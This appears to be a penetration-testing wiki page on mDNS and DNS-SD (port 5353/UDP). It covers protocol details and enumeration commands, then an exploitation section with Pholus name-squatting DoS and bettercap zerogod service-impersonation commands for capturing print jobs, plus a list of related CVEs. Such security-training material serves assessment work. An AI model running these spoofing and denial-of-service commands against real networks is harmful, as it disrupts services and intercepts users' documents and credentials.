# Multicast DNS (mDNS) and DNS-SD - PORT 5353/UDP

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic Information

Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a **local link without a unicast DNS server**.

* **Port:** 5353/UDP
* **Multicast addresses:**
  * `224.0.0.251` (IPv4)
  * `FF02::FB` (IPv6)

It’s most commonly associated with **Apple Bonjour**, **IoT devices**, and **DNS-SD (DNS Service Discovery)**.

#### Key Protocol Details

* Names in the `.local` zone are resolved via mDNS.
* The **QU (Query Unicast)** bit may request unicast replies even for multicast questions.
* Implementations *should* ignore packets not sourced from the local link, but some stacks accept them (attack surface).
* Probing/announcing enforces unique host/service names → interfering can create **DoS / name squatting** conditions.

#### DNS-SD Service Model

Services are identified as `_._tcp` or `_._udp` under `.local`. Examples:

* `_ipp._tcp.local` → printers
* `_airplay._tcp.local` → AirPlay
* `_adb._tcp.local` → Android Debug Bridge

You can discover service types with `_services._dns-sd._udp.local`, then resolve discovered instances to SRV/TXT/A/AAAA.

**Nmap scan result example:**

```
PORT     STATE SERVICE
5353/udp open  zeroconf
```

***

### Enumeration

#### Nmap

```bash
nmap -sU -p 5353 --script=dns-service-discovery <target>
```

Broadcast discovery **(on host)**:

```bash
sudo nmap --script=broadcast-dns-service-discovery 
```

#### Avahi (Linux)

```bash
# List service types
avahi-browse -bt _services._dns-sd._udp

# Browse all services and resolve to host/port
avahi-browse -art
```

#### Apple dns-sd (macOS)

```bash
# Browse all HTTP services
dns-sd -B _http._tcp

# Enumerate service types
dns-sd -B _services._dns-sd._udp

# Resolve a specific instance
dns-sd -L "My Printer" _ipp._tcp local
```

#### Packet Capture with Tshark

```bash
# Live capture
sudo tshark -i eth0 -f "udp port 5353" -Y mdns

# Only DNS-SD service list queries
sudo tshark -i eth0 -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
```

**Tip:** Browsers/WebRTC often use **ephemeral mDNS hostnames** (`random-UUID.local`) to mask local IPs. If you see these, resolve them to pivot to real IPs.

***

### Exploitations

#### DoS / Name Squatting

During the probing phase, a host checks for name uniqueness. Spoofing conflicts forces it to pick new names or fail.

Example with [**Pholus**](https://github.com/aatlasis/Pholus):

```bash
# Block new devices from taking names
sudo python3 pholus3.py eth0 -afre -stimeout 1000
```

#### Service Spoofing & Impersonation (MitM)

Impersonate advertised services (printers, AirPlay, HTTP) to **coerce clients into connecting to you**.

* Capture print jobs by spoofing `_ipp._tcp.local`
* Lure users to rogue HTTP services
* Relay NTLM hashes when Windows authenticates to spoofed services

With **bettercap’s zerogod** module:

```bash
# Discover services
sudo bettercap -iface eth0 -eval "zerogod.discovery on"

# Impersonate all services of a host
zerogod.impersonate 192.168.1.42

# Save intercepted print jobs
set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
zerogod.impersonate 192.168.1.42
```

***

### Recent Vulnerabilities

* **Avahi (Linux mDNS daemon)**
  * Reachable-assertion and D-Bus crash bugs (2023) → CVE-2023-38469..38473
  * Can crash `avahi-daemon`, disrupting discovery
* **Cisco IOS XE Wireless LAN Controller**
  * mDNS gateway DoS (2024, CVE-2024-20303)
  * Adjacent attacker can trigger high CPU & disconnect APs

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://whop.com/verylazytech/)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses.  📚

</details>
{% endhint %}